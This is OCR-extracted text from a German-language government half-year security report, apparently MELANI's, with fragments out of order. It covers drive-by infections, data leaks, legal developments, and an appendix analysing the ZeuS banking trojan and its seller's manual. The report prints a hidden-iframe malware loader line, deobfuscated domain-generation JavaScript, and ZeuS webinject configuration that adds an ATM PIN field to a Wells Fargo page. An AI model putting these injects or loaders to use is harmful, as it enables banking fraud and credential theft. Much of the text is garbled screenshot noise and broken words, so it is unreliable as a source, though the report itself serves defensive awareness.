Gro
67. iziert Beispiel 172 16 54 87 JavaScript Eine objektbasierte Scriptingsprache zur Entwicklung von Applika tionen JavaScripts sind im HTML Code integrierte Programmteile die bestimmte Funktionen im Internet Browser erm glichen Ein Beispiel kann das Kontrollieren von Benutzereingaben bei einem Webformular sein So kann berpr ft werden ob alle eingegebe nen Zeichen bei geforderter Angabe einer Telefonnummer auch wirklich Zahlen sind Wie ActiveX Controls werden JavaScripts auf dem Rechner des Webseitenbesuchers ausgef hrt Neben n tzli chen lassen sich leider auch sch dliche Funktionen programmie ren Im Gegensatz zu ActiveX werden JavaScripts von allen Brow sern unterst tzt Keylogger Ger te oder Programme die zwischen den Rechner und die Tas tatur geschaltet werden um Tastatureingaben aufzuzeichnen Kritische nationale Infrastrukturen Infrastruktur oder Teile der Wirtschaft deren Ausfall oder Besch digung massive Auswirkungen auf die nationale Sicherheit oder die konomische und oder soziale Wohlfahrt einer Nation hat In der Schweiz sind folgende Infrastrukturen als kritisch definiert worden Energie und Wasserversorgung Notfall und Rettungswesen Te lekommunikation Transport und Verkehr Banken und Versiche rungen Regierung und ffentliche Verwaltungen Im Informations zeitalter h ngt ihr Funktionieren zunehmend von Informations und Kommunikationssystemen ab Solche Systeme nennt
68. jedoch unter dem Ansturm neugieriger Inter net Nutzer zusammen Die italienische Datenschutzbeh rde verurteilte die Ver ffentlichung privater Informationen und verlangte die umgehende Sperrung der Seite Viele Daten befan den sich jedoch bereits im Umlauf Die Tageszeitung La Stampa beispielsweise hatte be reits zahlreiche Steuererkl rungen heruntergeladen und ver ffentlicht Im Mai 2008 ver ffentlichte ein Hacker Datens tze von 6 Millionen Chilenen im Internet wel che Namen Anschrift Telefonnummer sozialen Hintergrund und Bildungsverlauf von Per sonen umfassten Der Hacker soll in chilenische Regierungsserver eingebrochen sein und die Daten von dort kopiert haben Betroffen gewesen waren Server des Bildungsministeri ums der Wahlkommission der Armee sowie der staatlichen Telefongesellschaft Die Daten waren laut Berichten f r mehrere Stunden auf popul ren Webseiten verf gbar wo sie frei herunter geladen werden konnten Auch diese beiden F lle illustrieren die Schwierigkeit Daten welche auf dem Internet ver f fentlicht sind unter Kontrolle zu halten Dies muss sowohl bei privaten wie auch bei staatli chen Daten beachtet werden Wie das Beispiel Italien und auch das Beispiel Schengen sie he Kapitel 4 1 zeigen sind solche Datenpannen nicht nur auf technische Ursachen zur ck zuf hren Neben der technischen Sicherheit ist vor allem der Umgang der Mitarbeiter mit vertraulichen Dokumenten zu regeln siehe dazu auch Ka
69. kiescrm gt escape iv jexpiren sexd tooNTString 50 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Die Cookie relevanten Abfragen werden manuell entfernt da diese in der Emulation nicht funktionieren wurden E Malzilla by bobby Download Decoder mic Decoders Log Clipboard Monitor Notes Hex view PScrgt Toots Settings about New Tab t Sgr m Set Ah In 4640473 4642 6973 44734 Idul Geet 7ICH GITT TUE TT ET TT E E E TLIC PEI VOT KI dn E E Al ao Sx lt tSx lt ey ETVTR N i x Z0pn 2pr Id KTITRO OVZ2H20N20 m 1 5 Bai KI THA K7 IC KIA TN 4a I KB KT A THOT Dk I SSOKSHHPSOVTZ tat n 22 11 KB KTI THE M CHT E wl dee Od K7e IN t gt wudTgdu g er gt wudTgt9939eyvad EIER 2094 K7e 7N ect K7 OR wud A 7F ax89s eve sdiys 7F 03 Et lt 219keqhOb 8081 7881195 8 HES 9 9 budeb Obemeqnot Tluc ifboan TF THEOS lt iSav22 lt 3 des KEGA K7 IM JASO OMe yvOSSa KIC 7H 8229 82096698G EI 7H 8229 OPC Bx Kd Ei TASO rn ZG ul cult Sx 1 KOGd ET TA 6950822 PRI bu s0Smz Ka EI D s HS Fas TI 79473 ch e 8640 Iboty Ides 6dR 70494278271 for 143d0s 18 Icds cen s zer Gut Ser GIciovGe bG4wt2Sr 6IabIdh27H25644256242563 ume TT KK ISSde2SSct 2503220 Eaat T atZS7Ict KE EE ode Ides TAr2ba 571 748 tnt 67 frt Sle ACS Gar Sie Cos die 8268 Pimp cue pibg mq Br giv x
70. ller Ruhe auf einen anderen Server bertragen werden Unter den angege benen URLs brauchen nicht notwendigerweise Dateien vorhanden zu sein es geht vielmehr darum dass man sp ter unter diesen URLs Dateien ablegen kann Die Dateien m ssen erst abgelegt werden nachdem die Nicht verf gbarkeit der Haupt Konfiguratios Datei festgestellt wurde Falls Sie unter diesen URLs immer Dateien be reithalten m chten m ssen Sie sie immer gleichzeitig mit der Haupt Konfigurationsdatei erneuern Die Reserve dateien unterscheiden sich durch nichts von der Hauptdatei und werden auf dieselbe Weise erstellt wie diese URL Redirects In diesem Kapitel wird zur Vereinfachung anhand konkreter Beispiele die Funktionsweise der URL Redirects beschrieben Die Auflistung der URL Redirects im weiteren Fakes wird im Unterabschnitt WebFakes des Abschnitts Dy namicConfig aufgef hrt Format des Eintrags urspr ngliche URL neue URL Schalter Blackmask POST Whitemask POST Blo ckierungs URL 40 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international urspr ngliche URL URL die ge ndert werden soll es kann eine Mask verwendet werden neue URL Fake die URL die anstelle der urspr nglichen URL aufgerufen werden soll Schalter bestimmt die Hauptbedingung des Aufrufs kann aus mehreren Schaltern in beliebiger Rei henfolge bestehen allerdings wird die Gross Kleinschreibung ber ck
71. lyse mit Hilfe von Malzilla lt OCCAPE Languages avant ipi PEO TEDA PUN iii ten d Stee n Ste n Bach AT nd tg end AT III DENE Steen d SINE SHINE An ii qo gt gtt Re 82 SIT Te De en DO Maud Th De Pr OTL PVT IT Dh Ae Thee Tt TE Ted I Tan ET AE Teds Th 307 sf Ae Ta Te ff TEN Ae en ICTET hei mie iw ie ei dee Ten IE gie Ae DOT nie Dn et Dn Aen Ae AT IE Dn ie Ten OMI de ten Ae Th ZZ n INT Sad Met Sen de eyves da TEE lh MER ER E KT THe Jed CM I POODE EPITEET STORQOO I DIOR I SE Ari Sav 2522 KOSSGA KILEY TSLONSS 8 Bit 10 Det San Zi en Ir 220 ET TB t Zeg at i Lee gi SD pr ET TR vi Bir KT pr od EI Bi deu 12377 d i ege gd I S77 O5 O88 Je Ic LImLgWOb 000 11001299 DIE Zutrer eb Gage fein Zi AT Jest ISTF effi fe ieu sen ii in ien iii gen DONTE KOGA EI n Ein d B ere ai ET n Bi A2 SLOPES ET TEL SISID 1 PHL DE E ET RMD HELDEN e wt fe L ER LPL IR AOTOSDSTIND KA A WEE Dmh ISIR Du Du NET E ad Ka EEN TK OKT E AM MEA DK NM KACKEN MTM NAKACHE EC UNI NH NIE VVT KA SIONS SSS CUT SIGVT SIPASIA TEE EEGEN BARSI Peep tI cus dar p btg mcg i giv x apa ietwepetgte El drrb fsiireiristtstsrt eig NEE 1 fritirtepgrirpibriirer BI DREIER DIA EHEN II TATTA EE ME TK KO VEIREL As GV ITSM I Pen PETE Iv De MGT IE TRTY PETE TY ICT TROL BO MK EE E Fees Se ease 8278 26 4 90 Dek qhOd ett OF of qhOt ug Ted KIIR A Dewad e LeqOPey Ot Ae get fa MFG ET BI Jerus Taute Jahr
72. man kriti MELANI Halbjahresbericht 20091 31 52 Informationssicherung Lage in der Schweiz und international sche Informationsinfrastrukturen MAC Adresse Media Access Control Hardware Adresse Adresse eines Netzwerkadapters zu dessen weltweiten und ein deutigen Identifizierung Die MAC Adresse wird vom jeweiligen Hersteller in das ROM des Adapters geschrieben Beispiel 00 0d 93 ff fe a1 96 72 Malware ware Schadsoft Setzt sich aus den englischen Begriffen Malicious und Soft ware zusammen Oberbegriff f r Software die sch dliche Funkti onen auf einem Rechner ausf hrt wie beispielsweise Viren W r mer Trojanische Pferde Auch Malicious Code Patch Eine Software die einen fehlerhaften Teil eines Programms durch einen fehlerfreien ersetzt und dadurch z B eine Sicherheitsl cke behebt Pharming Manipulation der Namensaufl sung via DNS oder via lokale Konfi guration z B Hosts File mit dem Ziel Benutzer auf gef lschte Server umzuleiten und so an vertrauliche Daten Login Daten zu gelangen Phishing Mittels Phishing versuchen Betr ger an vertrauliche Daten von ahnungslosen Internet Benutzern zu gelangen Dabei kann es sich beispielsweise um Kontoinformationen von Online Auktionsanbietern z B eBay oder Zugangsdaten f r das Internet Banking handeln Die Betr ger nutzen die Gutgl ubigkeit und Hilfsbereitschaft ihrer Opfer aus indem sie ihnen be
73. mstieg auf Backupserver zwecks weiteren Funktionierens des Botnetzes sicherstellen soll was etwa bei polizeilichen Massnahmen notwendig werden kann Dazu kann eine alternative URL f r die Konfigurationsdatei genutzt werden Die Pro grammierer versichern dass damit eine ausreichende Robustheit des Netzes gew hrleistet sei 12 Es kann mit beliebigen Browsern Programmen gearbeitet werden die via wininet dll arbeiten Inter net Explorer AOL Maxton etc 1 Abfangen von POST Daten Abfangen von Tastatureingaben einschliesslich Daten die aus der Zwischenablage eingef gt werden 2 Transparente URL Umleitung auf Fake Websites etc mit Angabe einfachster Redirect Bedingungen zum Beispiel nur bei GET oder POST Abfrage bei Vorliegen oder Fehlen be stimmter Daten in der POST Abfrage 3 Transparente HTTP S Substitution des Inhalts Webinject welches das Austauschen nicht nur einer HTML Seite sondern auch jedes beliebigen anderen Datentyps erm glicht Der Aus tausch wird mit Hilfe der Angabe von Austauschmasken vorgenommen 4 Erhalt des Inhalts einer ben tigten Seite mit Ausschluss von HTML Tags Basiert auf Webin ject 5 Anpassbarer TAN Grabber f r beliebige Lander 6 Erhalt einer Liste von Fragen und Antworten der Bank Of America nach erfolgreicher Autori sierung 7 L schung gew nschter POST Daten auf gew nschten URL 8 IDEALE L SUNG F R VIRTUELLE TASTATUREN Nachdem Sie auf die gew nschte URL gegangen sind
74. n Traffic Kosten 3 Verpflichtet sich Fehler die in der Funktionsweise von ZeuS gefundene wurden zu korrigieren und binnen k rzester Fristen Updates ohne finanzielle Gegenleistung zuzusenden 4 Verpflichtet sich beliebigen Vorschl gen Meinungen R ckmeldungen zur Funktionsweise von ZeuS Geh r zu schenken und angemessene Entscheidungen zu treffen 2 Der Kunde 1 Ist nicht berechtigt ZeuS zu irgendwelchen kommerziellen oder nicht kommerziellen Zwecken zu verbreiten die nicht den Interessen des Verk ufers entsprechen 2 ist nicht berechtigt den bin ren Code des Bots und des Builders zu disassemblieren analysieren 3 Ist nicht berechtigt das Steuerungspanel zur Verwaltung anderer Botnets oder zu irgendwelchen anderen Zwecken zu verwenden die in keinem Zusammenhang mit ZeuS stehen 4 Ist nicht berechtigt absichtlich irgendwelche Teile von ZeuS an Antiviren Software Hersteller oder andere hnliche Einrichtungen zu senden 3 Siehe daf r auch den MELANI Halbjahresbericht 2006 2 http www melani admin ch dokumentation 00123 00124 01019 index html lang de Stand 21 Juli 2008 sowie folgenden Symantec Internet Security Threat Report http eval symantec com mktginfo enterprise white_papers ent whitepaper internet security threat_report xii exec summary 09 2007 en us pdf Stand 21 Juli 2008 35 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international 5 Verpflicht
75. n auch auf niederen Layern erfolgen k nnen z B SYN Flooding die h chstens im Log einer Firewall oder eines Routers auftauchen Interessant ist ebenfalls die Analyse der POST Eintr ge Diese repr sentieren die get tigten Eintr ge im G stebuch und werden an eine mySQL Datenbank weitergeleitet Zu einem bestimmten Zeitpunkt tauchten verd chtige Eintr ge auf welche sonst im Logfile nicht existierten Kurz darauf war auch die Datenbank ausgefallen Eine DDoS Attacke erscheint MELANI in diesem Fall unwahrscheinlich es wurden maximal um die 5 Zugriffe pro Sekunde erreicht Es ist wahrscheinlicher dass das System den vielen legitimen Anfragen lediglich nicht gewachsen war Hingegen konnte MELANI Hinweise f r eine m gliche Kompromittierung der dahinterliegenden mySQL Datenbank finden In dieser wurden die G stebucheintr ge abgelegt 4 3 Kriminalit t Verschiedene Webseiten f r Drive By Infektionen missbraucht Die Verbreitung von Drive By Infektionen hat in den letzten Monaten rasant zugenommen Es werden systematisch Seiten gehackt auf welchen anschliessend ein Schadcode platziert wird Zu diesem Zweck werden vor allem Schwachstellen in interaktiven Webinhalten ausge nutzt oder die Zugangsdaten der Webseitenadministratoren ausgesp ht Ende Juni 2008 wurden bei einem Schweizer Hosting Provider gleich massenweise Websei ten kompromittiert um darauf einen Link zu einem b sartigen JavaScript zu platzieren Das perfide bei
76. n etc zu ndern Im ersten Halbjahr 2008 wurden auch ber Drive By Infektionen siehe Kapitel 2 2 und 4 3 trojanische Pferde verteilt welche gegen Schweizer E Banking Kunden gerichtet waren Da bei handelte es sich jedoch um eine andere Schadsoftwarevariante als jene welche per E Mail verteilt wurde Im Allgemeinen gilt Folgendes Wenn beim E Banking unerkl rbare Abbr che der E Banking Sitzung auftreten sollten sich die betroffenen Kunden umgehend an die E Banking Hotline der jeweiligen Bank wenden M glicher Angriff auf forza eveline ch Am 9 April 2008 wurde publik dass die Seite www forza eveline net nicht mehr erreichbar war Die Webseite sammelte Sympathie Unterschriften f r die Bundesr tin Eveline Widmer Schlumpf Es bestand der Verdacht einer DDoS Attacke auf die Webseite Eine Analyse durch MELANI machte jedoch ersichtlich dass die zeitliche Verteilung der Anfragen keine aussergew hnlichen Spitzen sondern lediglich das typische zeitliche Surfverhalten von Be nutzern aus der Schweiz aufzeigte Eine Ubermassige Anzahl von Anfragen aus dem Aus land gab es ebenfalls nicht Der statistisch gut verteilte P Adressbereich aus praktisch nur schweizerischen Adressen legt die Vermutung nahe dass es sich mit grosser Wahrschein lichkeit nicht um eine DDoS Attacke gehandelt hat Das Datenvolumen war zwar gross sollte aber von einem mittleren Provider verkraftet werden k nnen Es bleibt aber anzumerken dass DDoS Attacke
77. nativrouten im arabischen Raum gibt Diese H ufung von Pannen f hrte zu zahlreichen Spekulationen ber deren Ursache Es ist mittlerweile bekannt dass mindestens zwei der Kabel durch Schiffsanker besch digt wur den Ganz grunds tzlich sind Sch den an Internet Seekabeln jedoch keine Seltenheit Allei ne im Jahr 2007 wurden ber 50 Reparaturen an Kabeln im Atlantik vorgenommen 7 Diese Vorf lle erinnern daran dass auch das Internet nur dank physikalischen Verbindungen funktioniert Beim Internet handelt es sich um lokale Netze welche durch sogenannte Back bones meist Glasfaserkabeln verbunden sind Die Kabel welche die Netze ausmachen existieren nicht berall in gleicher Dichte Somit gibt es Stellen wie jene am Mittelmeer wo lokale Verbindungsausf lle nicht ohne Weiteres auf benachbarte Leitungen berf hrt werden k nnen Ist eine solche Schwachstelle von einem bedeutenden Ausfall betroffen kann dies zu einer zeitweiligen Beeintr chtigung des Internets f hren Im Allgemeinen wirkt das Inter net jedoch mit seinem redundanten Aufbau Ausf llen entgegen und weist noch viel ber sch ssige Kapazit t auf was f r eine geringe Verwundbarkeit spricht Nachsichtiger Umgang mit sensiblen Daten Am 30 April 2008 ver ffentlichten die italienischen Beh rden Steuererkl rungen aus dem Jahr 2005 auf dem Internet Die Beh rden beabsichtigten dadurch f r mehr Transparenz zu sorgen Daraufhin brach die Steuerdatenbank
78. nen aber login vorkommt 41 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Webinjects Danach folgt eine Format Beschreibung fur die Benutzung der Webinjects Unter Webinjects versteht man Teile des HTML Codes die in die urspr nglichen Internetseiten eingef gt wer den oder Teile daraus ersetzen Mit data_before wird die Codezeile definiert nach der die Modifikation beginnt und mit data_after entsprechend das Ende der Modifikation Zwecks bequemeren Schreibens werden Webinjects in eine eigene Datei geschrieben die in der Konfigurations datei als DynamicConfig file_webinjects angegeben wird Selbstverstandlich werden nach der Erstellung der endg ltigen Konfigurationsdatei keinerlei zus tzlichen Dateien mehr generiert Die Datei besteht aus einer Auflistung von URLs f r die eine unbegrenzte Anzahl Webinjects angegeben werden kann die zu ndernde URL wird in einer Zeile nach den Regeln Konfigurationsdatei angegeben set_url URL Schalter Blackmask POST Whitemask POST wobei die beiden letzten Parameter fakultativ sind e URL die URL auf die das Webinjekt angesetzt werden soll der Einsatz einer Mask ist m glich e Schalter bestimmt die Hauptbedingung des Aufrufs kann aus mehreren Schalter in beliebiger Reihen folge bestehen allerdings wird die Gross Kleinschreibung ber cksichtigt case sensitive Derzeit sind folgende Schalter verf gbar o P We
79. nfang Juni 2008 hat das Bundeskabinett das Gesetz zur Ausweitung der Kompetenzen des Bundeskriminalamtes BKA im Kampf gegen den Terrorismus beschlossen Erstmals soll das BKA die Befugnis zur Gefahrenabwehr und somit Kompetenzen erhalten welche die Ermittlungst tigkeiten berschreiten Das Gesetz sieht unter anderem vor dass das BKA Online Durchsuchungen privater Computer durchf hren kann Bef rworter betonen die Not wendigkeit dieses Gesetzes im Kampf gegen den Terrorismus sowie seine Rechtskonformi t t unter anderem was das oben erw hnte Urteil des Bundesverfassungsgerichtes betrifft Gegner hingegen bezweifeln dies und halten das Gesetz f r verfassungswidrig insbesonde re was die Trennung zwischen Polizei und Geheimdienstarbeit betrifft Ob das Gesetz tat s chlich so in Kraft tritt ist fraglich denn es muss noch vom Parlament best tigt werden 7 In der Schweiz sind Online Durchsuchungen ohne konkreten Tatverdacht bislang verboten Im neuen Entwurf zum Bundesgesetz zur Wahrung der Inneren Sicherheit BWIS ist das Eindringen in Computer jedoch enthalten Diese Massnahme d rfte nur in Ausnahmef llen und unter strengen Voraussetzungen durchgef hrt werden Die Beratung des Gesetzesent wurfs in den eidgen ssischen R ten steht noch an Frankreich Aufr stung im Bereich der Bek mpfung von Cyber Attacken Im Juni 2008 hat Frankreich seine strategische Ausrichtung im Bereich der Verteidigung und nationalen Sicherhe
80. ngaben am 21 April 2008 von Hackern 12 Siehe f r weiterf hrende Informationen http www heise de security Grundsicherung fuer PHP Software artikel 96564 Stand 11 08 2008 16 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international angegriffen worden Angebote von uber 2 800 Gastgebern und Gasten wurden demnach gezielt gel scht Die verlorenen Daten konnten anhand von Backups gr sstenteils wieder hergestellt werden Gef lschte UEFA Lotterie W hrend der EURO 2008 wurden zahlreiche E Mails verschickt mit der Benachrichtigung dass der Empf nger in der UEFA Lotterie eine Million Euro gewonnen h tte Diese UEFA Lotterie war nat rlich frei erfunden Bei der E Mail handelte es sich um einen typischen Ver such anhand von falschen Versprechungen dem Empf nger Geld abzukn pfen Antwortet ein Empf nger auf eine solche E Mail wird unter irgendwelchen Vorgaben eine Vorauszah lung Gewinnsteuer verlangt Das zu Beginn versprochene Geld wird aber selbstverst nd lich nie berwiesen Defacement der Webseite des kroatischen Aussenministeriums Mutmasslich t rkische Hacker manipulierten w hrend des Spiels Kroatien T rkei die Inter netseite des kroatischen Aussenministeriums Anstelle des urspr nglichen Textes wurde eine t rkische Fahne angezeigt Nachdem die Manipulation bemerkt worden war wurde der Server abgeschaltet Stromausfall im internationalen Broadcastin
81. nste oder ganze Computer aus dem Netzwerk unerreichbar zu machen Trojanisches Pferd Trojanische Pferde h ufig als Trojaner bezeichnet sind Pro gramme die im Verborgenen sch dliche Aktionen ausf hren und sich dabei f r den Benutzer als n tzliche Anwendung oder Datei tarnen WEP Wired Equivalent Privacy Ein lteres als unsicher geltendes Verschl sselungsverfahren das bei WLAN Verbindungen eingesetzt wird WLAN WLAN oder Wireless Local Area Network steht f r drahtloses lokales Netzwerk WPA Wi Fi Protected Access Verbesserte Verschl sselungsmethode die bei Wireless LAN Verbindungen WLAN eingesetzt wird WPA2 Wi Fi Protected Access 2 Neuer Sicherheitsstandard f r Funknetzwerke f r Funknetzwerke nach der Spezifikation IEEE 802 11i Nachfolgeversion der Ver MELANI Halbjahresbericht 20091 33 52 Informationssicherung Lage in der Schweiz und international schlusselungsmethode WPA und des als unsicher geltenden WEP zip zip ist ein Algorithmus und Dateiformat zur Datenkompression um den Speicherbedarf von Dateien f r die Archivierung und Ubertra gung zu verringern MELANI Halbjahresbericht 20091 34 52 Informationssicherung Lage in der Schweiz und international 10Anhang 10 1 Professionalisierung der Internetkriminalitat am Beispiel ZeuS Seit einiger Zeit wird eine besorgniserregende Professionalisierung im Bereich der In
82. olle verwendet werden Eine rechtliche Grundlage die den Funknetzwerkbesitzer zur Identifikation seiner Nutzer verpflichten w rde gibt es bis heute jedoch nicht F r eine ausf hrliche Einsch tzung zur rechtlichen Lage in der Schweiz siehe Kapitel 6 Beim Einsatz von Funknetzwerken ist eine gewisse Sensibilit t bez glich Sicherheit ange bracht Personen die das Netz anderen nicht zur Verf gung stellen wollen tun gut daran dieses ausreichend zu sch tzen Will man hingegen das Funknetzwerk anderen zur Verf gung stellen dann sollte man im Vorfeld ber Einschr nkungen nachdenken Dies betrifft die Definierung der Personen welche auf das Funknetzwerk zugreifen sollen sowie die Dienste welche angeboten werden Das Kapitel 6 bietet dazu einige Tipps 3 2 Soziale Netzwerke und die Gefahr des Datenmiss brauchs Soziale Netzwerke bieten die M glichkeit mit relativ kleinem Aufwand ein eigenes Profil zu erstellen und sich damit auf dem Internet zu pr sentieren Ihre Beliebtheit liegt darin einfach und unkompliziert zahlreiche Kontakte zu kn pfen und zu pflegen Sie machen es gleicher massen m glich verloren geglaubte Schulkollegen wieder zu finden sowie einen neuen Job vermittelt zu kriegen Der rege Nutzen dieser Seiten insbesondere die Art und Weise wie viele Nutzer pers nliche Informationen ver ffentlichen birgt jedoch auch Gefahren Soziale Netzwerkseiten k nnen Cyber Kriminellen als willkommener Informations
83. ordrhein westf lische Verfassungsschutzgesetz welches ohne wesentliche Auflagen die heimliche Durchsuchung von privaten Computern vorsah wurde somit f r nichtig erkl rt Das Gericht entschied dass sich Fahnder bei der Online Durchsuchung an ein Grundrecht halten m s sen welches die Gew hrleistung der Vertraulichkeit und Integrit t informationstechnischer 23 Siehe f r die Entscheidung vom Bundesverfassungsgericht http www bundesverfassungsgericht de entscheidungen rs20080227 1bvr037007 html und f r die Pressemittei lung http www bundesverfassungsgericht de pressemitteilungen bvg08 022 htmls Stand 29 07 2008 4 Siehe zum Verfassungsschutzgesetz von Nordrhein Westfalen den MELANI Halbjahresberichtes 2007 2 Kapi tel 7 1 http www melani admin ch dokumentation 00123 00124 01048 index html lang de Stand 29 07 2008 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international Systeme vorsieht Eingriffe in dieses Recht sind sowohl zu praventiven Massnahmen als auch zur Strafverfolgung m glich jedoch nur unter strengen Bedingungen Eine Online Durchsuchung darf nur erfolgen wenn tats chliche Anhaltspunkte einer konkreten Gefahr f r ein berragend wichtiges Rechtgut bestehen Die Durchsuchung muss von einem Rich ter autorisiert werden und Daten welche den absolut gesch tzten Kernbereich privater Le bensgestaltung betreffen m ssen unverz glich gel scht werden A
84. otential behaftet Die Rechtslage ist in Bezug auf offene Funknetzwerke noch nicht vollst ndig gekl rt In Deutschland haben in den letzen Jahren einige Gerichtsurteile in diesem Bereich aufhorchen lassen So griff das Landgericht Hamburg bei einem Entscheid im Juli 2006 auf die Grund s tze der St rerhaftung zur ck Als St rer haftet grunds tzlich jeder der in irgendeiner Weise willentlich und ad quat kausal an der Herbeif hrung der rechtwidrigen Beeintr chti gung mitwirkt Auch Dienstanbieter welche durch die blosse Zugangsgew hrung zu fremden Inhalten einen mittelbaren Tatbeitrag zur Rechtsverletzung in Form der Weiterverbreitung der Informationen leisten sollen als St rer qualifiziert werden k nnen Wer seine Internet verbindung drahtlos betreibt muss f r die Sicherung seines Routers sorgen andernfalls ver st sst er gegen die zumutbaren Pr fungspflichten Ein Beschluss des Oberlandesgerichts D sseldorf legte fest dass jeder f r die Sicherheit seines WLANs selbst verantwortlich sei und f r m gliche Konsequenzen eines Missbrauchs bei ungen gender Sicherheit gerade 15 IT Security Ausgabe 2 2006 Seite 40 Ge http www lifepr de pressemeldungen pc feuerwehr franchise interactive media gmbh boxid 20794 html Stand 11 08 2008 http www pressetext ch pte mc pte 070904001 Stand 11 08 2008 18 Siehe Gerichtsurteil Landgericht Hamburg http www lampmannbehn de wlan html Stand 11 08 2008 21 52 MELAN
85. p GPL data_before lt form name fiat lt form gt data_end data_inject data_end data_after lt th colspan 4 align left valign bottom data_end set_url https online wellsfargo com das cgi bin session cgi GL data_before lt div id pagelntro class noprint gt 0000000000000 42 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international data_end data_inject data_end data_after lt td id sidebar align left valign top class noprint gt data_end set_url https www wellsfargo com G data_before lt span class mozcloak gt lt input type password lt span gt data_end data_inject lt br gt lt strong gt lt label for atmpin gt ATM PIN lt label gt lt strong gt amp nbsp lt br gt lt span class mozcloak gt lt input type password accesskey A id atmpin name USpass size 13 maxlength 14 style width 147px tabindex 2 gt lt span gt data_end data_after o data end Oo oo oo 00000000 0 OO TAN Grabber Das letzte Kapitel der Gebrauchsanweisung befasst sich mit der Funktion des TAN Grabbers Transaction Authentification Number Das Beispiel bezieht sich auf eine Online Banking Adresse Auflistung der Einstellungen des TAN Grabbers wird im Unterabschnitt TanGrabber des Abschnitts Dynamic Config gespeichert Format des Eintrags URL Mask Schalter Whitemask POST Blackmask POST Bezeichnung des Werts URL M
86. pitel 2 1 13 Siehe daf r http www economist com world international displaystory cfm story_id 10653963 Stand 29 07 2008 4 Siehe f r weitere Informationen http www heise de tr Warum das Netz zusammenbrach artikel 103167 und http www heise de newsticker Satellitenbilder klaeren Ursachen fuer Seekabelbeschaedigungen meldung 106502 Stand 29 07 2008 19 52 MELANI Halbjahresbericht 20091 Informationssicherung Lage in der Schweiz und international 5 2 Attacken Politisch motiviertes Hacking Litauen und Radio Free Europe im Visier Ende Juni 2008 wurden rund 300 litauische Webseiten verunstaltet und unter anderem mit Symbolen der ehemaligen Sowjetunion Hammer und Sichel versehen Die Attacke erfolgte just einige Tage nach der Verabschiedung eines Gesetzes in Litauen welches unter ande rem die Zurschaustellung dieser sowjetischen Symbole unter Strafe stellt Betroffen von der Attacke waren Webseiten der Regierung politischer Parteien sowie privater Unternehmen Die meisten dieser Seiten wurden auf einem einzigen physikalischen Server gehosted bei welchem eine Sicherheitsl cke ausgenutzt wurde Eine DDoS Attacke welche ebenfalls politisch motiviert gewesen sein d rfte richtete sich im April 2008 gegen das durch die USA unterst tze Radio Free Europe Die Attacke richtete sich haupts chlich gegen den Dienst von Radio Free Europe in Weissrussland und startete am Jahrestag der atomaren Katastrophe
87. r nken Systeme nur einmal mit einer Malware zu bedienen oder um gewisse IP Adressbereiche auszublenden A lt div style visibilityhidden gt lt iframe sre http H annwes com ld grg width 100 height 80 gt lt iframe gt lt div gt Abbildung 3 Ein versteckter iFrame initiiert den Download der Malware Der JavaScript Code Ubermittelt ausserdem Informationen Uber die benutzten Browser Versionen und Plugins Acrobat Flash etc worauf der Server eine darauf zugeschnittene Malware zur Ausf hrung zur ckschickt Eine Besonderheit in diesem Script ist die Variation der Domane in Abhangigkeit des Da tums Abbildung 4 zeigt den Teil des entschleierten JavaScript Codes der de Dom ne krei ert Die t9 Arrays werden verwendet um das Datum zu kodieren und werden dann mittels der Variablen yCh2 fur das Jahr mCh fur den Monat yCh1 wiederum fur das Jahr dCh f r den Wochentag m9 f r den Monat in Buchstabenform verarbeitet um den Dom nen Namen mit com am Schluss zu kreieren Mit Hilfe dieses Algorithmus ist es m glich die Domain Namen im Voraus zu berechnen Man sieht z B dass alle DNS Namen im Monat Juni auf xes com enden siehe Fett markierte Scriptteile var m9 new Array uno dve thr fir vif xes ves ght eni etn lev twe var I9 new Array a b c d e f g h i j K l m n 0 p q r s tu v wX y Zz var n9 new Array 1 2 3 4 5 6 7 8 9 var t9 new Ar
88. r nkten Zeitraums m ssen sich Interessenten zun chst um die Einf hrung bewerben wobei s mtliche Bewerbungen ver ffentlich werden Darin kann jeder Vorbehalte etwa wegen Rassismus Wettbewerbskonflikten oder einer zu grossen hnlichkeit der Adressen anmelden F r das gesamte Verfahren sind vier Monate vorgesehen Bereits 2003 wurden Internationalized Domain Names IDN eingef hrt Die se k nnen Nicht ASCIl Zeichen wie beispielsweise deutsche Umlaute Kanji hebr ische arabische oder auch kyrillische Zeichen enthalten Diese in Unicode kodierten Zeichen wan deln Punycode taugliche Anwendungen in f r Internet Anwendungen lesbaren ASCII Text um Diese gelten aber nur ab der Second Level Domain Internationalized Domain Names IDN z hlen seit nunmehr vier Jahren zu den festen Ein richtungen des Domain Name Systems DNS Sie erlauben die Benutzung von landestypi schen Sonderzeichen auf Ebene der Second Level Domain wobei jeder Registrar frei be stimmt ob und welche Sonderzeichen er anbietet In der Schweiz sind dies vor allem die Umlaute respektive Zeichen mit Akzenten Wie bei der Einf hrung der IDN vor vier Jahren ist auch bei der Einf hrung beliebiger TLDs damit zu rechnen dass Fragen aufgeworfen werden Erw hnt sei beispielsweise das Erstzugriffsrecht oder die Zul ssigkeit von Endun gen Eine zus tzliche Anzahl Zeichen erh ht auch das Betrugspotential f r Typo respektive hnlich lautende oder aussehende Dom n
89. r Anwendung f r Windows die zur Konfiguration des Bots dient 3 dem Bot einer Anwendung f r Windows die aber bereits auf dem Rechner des Opfers ausgef hrt wird ZeuS verf gt ber folgende grundlegenden M glichkeiten und Eigenschaften hier wird die komplette Liste ange f hrt in Ihrer Zusammenstellung kann ein Teil dieser Liste fehlen 1 Der Bot 1 In VC 8 0 geschrieben ohne Verwendung von RTL usw in reiner WinAPI wodurch ein geringer Umfang erreicht wird 10 25 Kb je nach Paketzusammenstellung 2 Verfugt ber keinen eigenen Prozess wodurch er in der Liste der Prozesse nicht entdeckt werden kann 3 Umgeht die Mehrzahl der Firewalls einschliesslich der popul ren Outpost Firewall der Versionen 3 4 es besteht aber ein tempor res kleines Problem mit Anti Spyware Programmen Die ungehin derte Annahme eingehender Verbindungen kann nicht garantiert werden 4 Ist durch Suche Analyse schwer aufzusp ren der Bot installiert sich beim Opfer und erstellt eine Datei mit der Zeit wohl Erstellungs Anderungsdatum Anm d U von Systemdateien und einer willk rlichen Dateigr sse 5 Funktioniert unter 